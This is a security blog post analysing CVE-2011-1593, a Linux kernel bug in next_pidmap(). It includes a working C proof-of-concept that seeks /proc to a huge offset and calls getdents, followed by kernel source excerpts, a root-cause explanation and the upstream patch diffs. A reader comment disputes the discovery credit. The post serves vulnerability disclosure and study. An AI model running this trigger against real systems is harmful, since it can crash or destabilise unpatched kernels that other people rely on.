xorl %eax, %eax

CVE-2011-1593: Linux kernel proc next_pidmap() Invalid Memory Access

with one comment

This vulnerability was discovered and reported by Tavis Ormandy and Robert Swiecki using the ‘iknowthis’ system call fuzzer. The PoC code that triggers it is shown below.

// Found by Tavis Ormandy's (taviso@cmpxchg8b.com):
// http://code.google.com/p/iknowthis/
// Analyzed by Robert Swiecki <robert@swiecki.net>
#define _GNU_SOURCE 1
#define _LARGEFILE64_SOURCE
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

/*
 * Trigger for CVE-2011-1593: open /proc, seek the directory to a huge
 * offset, then read it with the raw getdents system call.
 *
 * Returns 0 when the whole sequence ran, -1 when /proc could not be opened
 * or the seek failed (in which case getdents is never attempted).
 */
int main(void)
{
  /* Record layout used to size the buffer handed to getdents. */
  struct linux_dirent {
    long           d_ino;
    off_t          d_off;
    unsigned short d_reclen;
    char           d_name[];
  };
  struct linux_dirent b[100];

  int fd = open("/proc", O_DIRECTORY | O_RDONLY);
  if (fd == -1) {
    perror("open");
    return -1;
  }

  /* Without a successful seek the getdents call below exercises nothing. */
  if (lseek64(fd, 4000000000ULL, SEEK_SET) == -1) {
    perror("lseek64");
    close(fd);
    return -1;
  }

  /* A failure here is only reported; it is not treated as a PoC error. */
  if (syscall(__NR_getdents, fd, b, sizeof(b)) == -1) {
    perror("getdents");
  }

  close(fd);
  return 0;
}

The code is very straightforward. After opening the ‘/proc’ directory and repositioning the file offset to 4000000000 using the lseek64() system call, it invokes getdents() to read directory entries into the ‘b[]’ array, passing sizeof(b) as the buffer size.

The bug is triggered in next_pidmap(), but the root cause is a missing check inside proc_pid_readdir(), which can be found in fs/proc/base.c. More specifically, have a look at the following code snippet of the latter routine.

/*
 * for the /proc/ directory itself, after non-process stuff has been done
 *
 * Excerpt only: the "..." lines mark code that the article elided.
 * Every exit path visible here returns 0.
 */
int proc_pid_readdir(struct file * filp, void * dirent, filldir_t filldir)
{
        /* taken straight from filp->f_pos; no range check on f_pos is visible before this */
        unsigned int nr = filp->f_pos - FIRST_PROCESS_ENTRY;
        struct task_struct *reaper = get_proc_task(filp->f_path.dentry->d_inode);
        struct tgid_iter iter;
        struct pid_namespace *ns;
    ...
        for (; nr < ARRAY_SIZE(proc_base_stuff); filp->f_pos++, nr++) {
                const struct pid_entry *p = &proc_base_stuff[nr];
    ...
        /* the starting tgid is also derived from the unchecked f_pos */
        iter.tgid = filp->f_pos - TGID_OFFSET;
        /* keep asking next_tgid() for entries until it yields no task */
        for (iter = next_tgid(ns, iter);
             iter.task;
             iter.tgid += 1, iter = next_tgid(ns, iter)) {
                filp->f_pos = iter.tgid + TGID_OFFSET;
                if (proc_pid_fill_cache(filp, dirent, filldir, iter) < 0) {
                        /* fill failed: drop the current task and stop */
                        put_task_struct(iter.task);
                        goto out;
                }
        }
        /* loop ran to completion: park f_pos at PID_MAX_LIMIT + TGID_OFFSET */
        filp->f_pos = PID_MAX_LIMIT + TGID_OFFSET;
out:
        put_task_struct(reaper);
/* jumping here bypasses the put_task_struct(reaper) above */
out_no_task:
        return 0;
}

As you can see, nothing checks that the file position is valid before it is processed further. The huge value stored in ‘filp->f_pos’ (minus TGID_OFFSET) is passed to next_tgid() in the ‘tgid’ field of the ‘iter’ argument. This function, which resides in the same source file, leads to the following code path.

/*
 * Excerpt only: the "..." lines mark code that the article elided.
 * In the visible lines iter.task is cleared and iter.tgid is handed to
 * find_ge_pid() unchanged; no range check on iter.tgid appears here.
 * The (possibly updated) iterator is returned by value.
 */
static struct tgid_iter next_tgid(struct pid_namespace *ns, struct tgid_iter iter)
{
        struct pid *pid;
    ...
retry:
        iter.task = NULL;
        /* iter.tgid goes to find_ge_pid() as-is */
        pid = find_ge_pid(iter.tgid, ns);
    ...
        rcu_read_unlock();
        return iter;
}

This passes the huge value to find_ge_pid(), a C routine from the kernel/pid.c file that you can see here.

/*
 * Used by proc to find the first pid that is greater than or equal to nr.
 *
 * If there is a pid at nr this function is exactly the same as find_pid_ns.
 *
 * Returns the pid that was found, or a null pointer once next_pidmap()
 * hands back a value that is not greater than 0.
 */
struct pid *find_ge_pid(int nr, struct pid_namespace *ns)
{
        struct pid *pid;

        do {
                pid = find_pid_ns(nr, ns);
                if (pid)
                        break;
                /* nr is forwarded as-is; nothing in this function limits its range */
                nr = next_pidmap(ns, nr);
        } while (nr > 0);

        return pid;
}

This reaches next_pidmap(), which does not perform any checks on its second argument (the integer ‘last’) and handles it as a signed integer.

/*
 * Walk the pidmap entries of pid_ns, starting with the entry and bit offset
 * computed from last + 1, and return mk_pid() for the first position that
 * find_next_bit() reports below BITS_PER_PAGE.
 *
 * Returns -1 when the walk reaches &pid_ns->pidmap[PIDMAP_ENTRIES] without
 * such a position.
 */
int next_pidmap(struct pid_namespace *pid_ns, int last)
{
        int offset;
        struct pidmap *map, *end;

        offset = (last + 1) & BITS_PER_PAGE_MASK;
        /* 'last' feeds the array index directly; there is no bounds check */
        map = &pid_ns->pidmap[(last + 1)/BITS_PER_PAGE];
        end = &pid_ns->pidmap[PIDMAP_ENTRIES];
        /* only the first entry is searched from 'offset'; later ones from bit 0 */
        for (; map < end; map++, offset = 0) {
                /* entries without a page are skipped */
                if (unlikely(!map->page))
                        continue;
                offset = find_next_bit((map)->page, BITS_PER_PAGE, offset);
                if (offset < BITS_PER_PAGE)
                        return mk_pid(pid_ns, map, offset);
        }
        return -1;
}

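Because ‘f_pos’ is never checked, the above function attempts to access invalid memory: the bogus ‘last’ value is used as part of the array index into ‘pid_ns->pidmap[]’. The huge offset does not fit in the signed ‘int’ parameters of find_ge_pid() and next_pidmap() (assuming the usual 32-bit int), so ‘(last + 1)/BITS_PER_PAGE’ yields an index outside the array.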

To fix this bug Linus Torvalds committed a patch in proc_pid_readdir() that checks the offset to avoid any truncated values. Here is this patch.

 int proc_pid_readdir(struct file * filp, void * dirent, filldir_t filldir)
 {
-	unsigned int nr = filp->f_pos - FIRST_PROCESS_ENTRY;
-	struct task_struct *reaper = get_proc_task(filp->f_path.dentry->d_inode);
+	unsigned int nr;
+	struct task_struct *reaper;
 	struct tgid_iter iter;
 	struct pid_namespace *ns;
 
+	if (filp->f_pos >= PID_MAX_LIMIT + TGID_OFFSET)
+		goto out_no_task;
+	nr = filp->f_pos - FIRST_PROCESS_ENTRY;
+
+	reaper = get_proc_task(filp->f_path.dentry->d_inode);
 	if (!reaper)
 		goto out_no_task;

As you can see, ‘filp->f_pos’ is now checked against PID_MAX_LIMIT + TGID_OFFSET. PID_MAX_LIMIT is defined in the include/linux/threads.h header file:

/*
 * This controls the default maximum pid allocated to a process
 */
#define PID_MAX_DEFAULT (CONFIG_BASE_SMALL ? 0x1000 : 0x8000)

/*
 * A maximum of 4 million PIDs should be enough for a while.
 * [NOTE: PID/TIDs are limited to 2^29 ~= 500+ million, see futex.h.]
 */
#define PID_MAX_LIMIT (CONFIG_BASE_SMALL ? PAGE_SIZE * 8 : \
        (sizeof(long) > 4 ? 4 * 1024 * 1024 : PID_MAX_DEFAULT))

And TGID_OFFSET of fs/proc/base.c

#define TGID_OFFSET (FIRST_PROCESS_ENTRY + ARRAY_SIZE(proc_base_stuff))

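This check is there to avoid any truncated offset values. The get_proc_task() call was moved below the new check, so the early jump to ‘out_no_task’ (a label that skips put_task_struct()) happens before any task reference is taken; the call itself is used to identify inodes owned by PID 0 (which is the scheduler) and immediately jump to the ‘out_no_task’ label.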
In addition to this, kernel/pid.c was updated to explicitly check against the PID_MAX_LIMIT and fix the signedness issue like this:

-int next_pidmap(struct pid_namespace *pid_ns, int last)
+int next_pidmap(struct pid_namespace *pid_ns, unsigned int last)
 {
 	int offset;
 	struct pidmap *map, *end;
 
+	if (last >= PID_MAX_LIMIT)
+		return -1;
+
 	offset = (last + 1) & BITS_PER_PAGE_MASK;

Written by xorl

April 25, 2011 at 18:02

Posted in bugs, linux

One Response

Subscribe to comments with RSS.

  1. Just for clarification, Robert used Taviso fuzzer “iknowthis” to find the bug and analyzed it by himself. Taviso didn’t reported it nor discovered. The intro may be a little bit misleading;-)

    s1m0n

    April 26, 2011 at 11:25


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s